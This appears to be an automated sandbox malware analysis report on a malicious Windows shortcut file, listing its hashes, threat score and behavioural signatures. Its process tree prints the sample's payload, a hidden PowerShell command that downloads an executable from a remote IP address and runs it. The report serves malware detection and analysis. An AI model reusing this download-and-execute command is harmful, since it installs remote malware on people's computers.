Analysis
-
max time kernel
121s -
max time network
121s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
31-12-2024 08:32
Static task
static1
Behavioral task
behavioral1
Sample
009274965.lnk
Resource
win7-20240903-en
windows7-x64
5 signatures
150 seconds
Behavioral task
behavioral2
Sample
009274965.lnk
Resource
win10v2004-20241007-en
windows10-2004-x64
14 signatures
150 seconds
General
-
Target
009274965.lnk
-
Size
2KB
-
MD5
7f070dfbaa6893bb2effac0f2320a1d7
-
SHA1
293e7f6f6e70a0c7699215b3402dc5ff2bb2bfaa
-
SHA256
aeed70a3f936b699e93f18dfc5b4a582a6a08be7d52d8e6229754f96205aecb2
-
SHA512
720b2a90dd051160aeaa1a11a70433213b96f04e8d160c55c699f4fd6af7f1c07db61e110e684d9ce91ad79e987bd809497eb2d52ac2f3bd96cdb289c443b883
Score
8/10
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2700 powershell.exe 2700 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2700 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2700 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2616 wrote to memory of 2700 2616 cmd.exe 31 PID 2616 wrote to memory of 2700 2616 cmd.exe 31 PID 2616 wrote to memory of 2700 2616 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\009274965.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2616 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -command "& { Invoke-WebRequest -Uri http://87.120.113.91/image.exe -OutFile C:\Users\Admin\AppData\Local\Temp\file.exe; Start-Process 'C:\Users\Admin\AppData\Local\Temp\file.exe' }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-